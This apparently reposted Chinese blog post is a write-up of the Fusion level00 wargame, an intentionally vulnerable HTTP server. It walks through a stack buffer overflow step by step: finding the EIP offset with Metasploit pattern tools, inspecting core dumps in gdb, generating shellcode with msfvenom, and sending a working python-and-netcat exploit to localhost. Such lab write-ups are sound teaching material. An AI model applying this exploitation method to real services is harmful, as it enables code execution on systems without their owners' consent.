溫馨提示×

溫馨提示×

您好,登錄后才能下訂單哦!

密碼登錄×
登錄注冊×
其他方式登錄
點(diǎn)擊 登錄注冊 即表示同意《億速云用戶服務(wù)條款》

Fusion level00

發(fā)布時(shí)間:2020-07-20 10:56:34 來源:網(wǎng)絡(luò) 閱讀:1800 作者:terrying 欄目:安全技術(shù)

經(jīng)過半個(gè)多月的時(shí)間把Protostar完成了,休息了幾天,繼續(xù)做Fusion。

*********題外話開始**********

在大學(xué)期間就在糾結(jié)是否選擇程序猿的道路,結(jié)果因長時(shí)間高負(fù)荷寫代碼會(huì)引發(fā)不適而放棄了,不得不贊一下調(diào)好一個(gè)BUG時(shí)那種feel。如今,當(dāng)完成一道題目也會(huì)有這種feel~~~~

*********題外話結(jié)束**********

level00源碼:

#include "../common/common.c"
int fix_path(char *path)
{
 char resolved[128];
 if(realpath(path, resolved) == NULL) return 1; // can't access path. will error trying to open
 strcpy(path, resolved);
}
char *parse_http_request()
{
 char buffer[1024];
 char *path;
 char *q;
 printf("[debug] buffer is at 0x%08x :-)\n", buffer);
 if(read(0, buffer, sizeof(buffer)) <= 0) errx(0, "Failed to read from remote host");
 if(memcmp(buffer, "GET ", 4) != 0) errx(0, "Not a GET request");
 path = &buffer[4];
 q = strchr(path, ' ');
 if(! q) errx(0, "No protocol version specified");
 *q++ = 0;
 if(strncmp(q, "HTTP/1.1", 8) != 0) errx(0, "Invalid protocol");
 fix_path(path);
 printf("trying to access %s\n", path);
 return path;
}
int main(int argc, char **argv, char **envp)
{
 int fd;
 char *p;
 background_process(NAME, UID, GID);
 fd = serve_forever(PORT);
 set_io(fd);
 parse_http_request();
}

Fusion的題目是Protostar的進(jìn)階版,難度也更難了,當(dāng)然,level00還是個(gè)熱身題。通過題目提示知道是個(gè)Stack問題,而且shellcode應(yīng)該放在resolved之外。


既然是Stack問題,那就來個(gè)長點(diǎn)的字符串吧。

fusion@fusion:/opt/metasploit-framework/tools$ ./pattern_create.rb 150
Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9
fusion@fusion:~$ python -c "print 'GET /'+'Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9' + ' HTTP/1.1'" | nc localhost 20000
[debug] buffer is at 0xbf89b338 :-)

######################################################################

# 修改core文件生成路徑的方法是: #

# sudo sh -c 'echo "/tmp/core.%t" > /proc/sys/kernel/core_pattern' #

######################################################################

通過gdb來查看core文件

fusion@fusion:/tmp$ sudo -s gdb --quiet --core=core.1368248639
[sudo] password for fusion:
[New LWP 2495]
Core was generated by `./level00'.
Program terminated with signal 11, Segmentation fault.
#0  0x65413665 in ?? ()
(gdb)

用pattern_offset.rb工具:

fusion@fusion:/opt/metasploit-framework/tools$ ./pattern_offset.rb 0x65413665
139

由此可以得到溢出的字符修改EIP的位置在長度139的位置

接下來需要在輸入中放進(jìn)shellcode,通過core文件找到shellcode的位置。

fusion@fusion:~$ python -c "print 'GET /'+'a'*139 + '\xef\xbe\xad\xde' + ' HTTP/1.1' + '\x90'*100 + 'a'*100 " | nc localhost 20000
[debug] buffer is at 0xbf89b338 :-)

***************

fusion@fusion:/tmp$ sudo -s gdb --core=core.1368255737
GNU gdb (Ubuntu/Linaro 7.3-0ubuntu2) 7.3-2011.08
Copyright (C) 2011 Free Software Foundation, Inc.
License GPLv3+: GNU GPL version 3 or later <http://gnu.org/licenses/gpl.html>
This is free software: you are free to change and redistribute it.
There is NO WARRANTY, to the extent permitted by law.  Type "show copying"
and "show warranty" for details.
This GDB was configured as "i686-linux-gnu".
For bug reporting instructions, please see:
<http://bugs.launchpad.net/gdb-linaro/>.
[New LWP 2833]
Core was generated by `./level00'.
Program terminated with signal 11, Segmentation fault.
#0  0xdeadbeef in ?? ()
(gdb) x/200x 0xbf89b340
0xbf89b340:     0x61616161      0x61616161      0x61616161      0x61616161
0xbf89b350:     0x61616161      0x61616161      0x61616161      0x61616161
0xbf89b360:     0x61616161      0x61616161      0x61616161      0x61616161
0xbf89b370:     0x61616161      0x61616161      0x61616161      0x61616161
0xbf89b380:     0x61616161      0x61616161      0x61616161      0x61616161
0xbf89b390:     0x61616161      0x61616161      0x61616161      0x61616161
0xbf89b3a0:     0x61616161      0x61616161      0x61616161      0x61616161
0xbf89b3b0:     0x61616161      0x61616161      0x61616161      0x61616161
0xbf89b3c0:     0x61616161      0x61616161      0xdeadbeef      0x54544800
0xbf89b3d0:     0x2e312f50      0x90909031      0x90909090      0x90909090
0xbf89b3e0:     0x90909090      0x90909090      0x90909090      0x90909090
0xbf89b3f0:     0x90909090      0x90909090      0x90909090      0x90909090
0xbf89b400:     0x90909090      0x90909090      0x90909090      0x90909090
0xbf89b410:     0x90909090      0x90909090      0x90909090      0x90909090
0xbf89b420:     0x90909090      0x90909090      0x90909090      0x90909090
0xbf89b430:     0x90909090      0x90909090      0x61616190      0x61616161
0xbf89b440:     0x61616161      0x61616161      0x61616161      0x61616161
0xbf89b450:     0x61616161      0x61616161      0x61616161      0x61616161
0xbf89b460:     0x61616161      0x61616161      0x61616161      0x61616161
0xbf89b470:     0x61616161      0x61616161      0x61616161      0x61616161
0xbf89b480:     0x61616161      0x61616161      0x61616161      0x61616161
0xbf89b490:     0x0a616161      0x00000004      0xb77bc6e0      0x00000000


可以得到寫的字符串從0xbf89b3d5開始記錄。同樣,在shellcode前面填充一些0x90。因此得到的payload格式應(yīng)該是這樣的:

GET /AAA……AA\x00\xb4\x89\xbf HTTP/1.10x90……0x90[SHELLCODE]

先獲得一個(gè)shellcode:

fusion@fusion:/opt/metasploit-framework$ sudo -s ./msfvenom -p linux/x86/exec -f pl CMD="touch /tmp/fusion_for_zsz"
[sudo] password for fusion:
my $buf =
"\x6a\x0b\x58\x99\x52\x66\x68\x2d\x63\x89\xe7\x68\x2f\x73" .
"\x68\x00\x68\x2f\x62\x69\x6e\x89\xe3\x52\xe8\x1a\x00\x00" .
"\x00\x74\x6f\x75\x63\x68\x20\x2f\x74\x6d\x70\x2f\x66\x75" .
"\x73\x69\x6f\x6e\x5f\x66\x6f\x72\x5f\x7a\x73\x7a\x00\x57" .
"\x53\x89\xe1\xcd\x80";


于是乎:

fusion@fusion:~$ python -c "print 'GET /'+'a'*139 + '\x10\xb4\x89\xbf' + ' HTTP/1.1' + '\x90'*100 + '\x6a\x0b\x58\x99\x52\x66\x68\x2d\x63\x89\xe7\x68\x2f\x73\x68\x00\x68\x2f\x62\x69\x6e\x89\xe3\x52\xe8\x1a\x00\x00\x00\x74\x6f\x75\x63\x68\x20\x2f\x74\x6d\x70\x2f\x66\x75\x73\x69\x6f\x6e\x5f\x66\x6f\x72\x5f\x7a\x73\x7a\x00\x57\x53\x89\xe1\xcd\x80' " | nc localhost 20000
[debug] buffer is at 0xbf89b338 :-)
fusion@fusion:/tmp$ ll
total 912
drwxrwxrwt 4 root  root     340 2013-05-11 17:30 ./
drwxr-xr-x 1 root  root     240 2013-05-11 22:50 ../
-rw------- 1 root  20000 196608 2013-05-11 15:03 core.1368248639
-rw------- 1 root  20000 196608 2013-05-11 15:33 core.1368250392
-rw------- 1 root  20000 196608 2013-05-11 15:36 core.1368250571
-rw------- 1 root  20000 196608 2013-05-11 15:41 core.1368250870
-rw------- 1 root  20000 196608 2013-05-11 15:46 core.1368251166
-rw------- 1 root  20000 196608 2013-05-11 15:51 core.1368251470
-rw------- 1 root  20000 196608 2013-05-11 16:02 core.1368252121
-rw------- 1 root  20000 196608 2013-05-11 17:02 core.1368255737
-rw------- 1 root  20000 196608 2013-05-11 17:16 core.1368256578
-rw------- 1 root  20000 196608 2013-05-11 17:16 core.1368256609
-rw------- 1 root  20000 196608 2013-05-11 17:19 core.1368256755
-rw------- 1 root  20000 196608 2013-05-11 17:24 core.1368257093
-rw-r--r-- 1 20000 20000      0 2013-05-11 17:30 fusion_for_zsz
drwxrwxrwt 2 root  root      40 2013-05-11 22:50 .ICE-unix/
drwxrwxrwt 2 root  root      40 2013-05-11 22:50 .X11-unix/




向AI問一下細(xì)節(jié)

免責(zé)聲明:本站發(fā)布的內(nèi)容(圖片、視頻和文字)以原創(chuàng)、轉(zhuǎn)載和分享為主,文章觀點(diǎn)不代表本網(wǎng)站立場,如果涉及侵權(quán)請聯(lián)系站長郵箱:is@yisu.com進(jìn)行舉報(bào),并提供相關(guān)證據(jù),一經(jīng)查實(shí),將立刻刪除涉嫌侵權(quán)內(nèi)容。

AI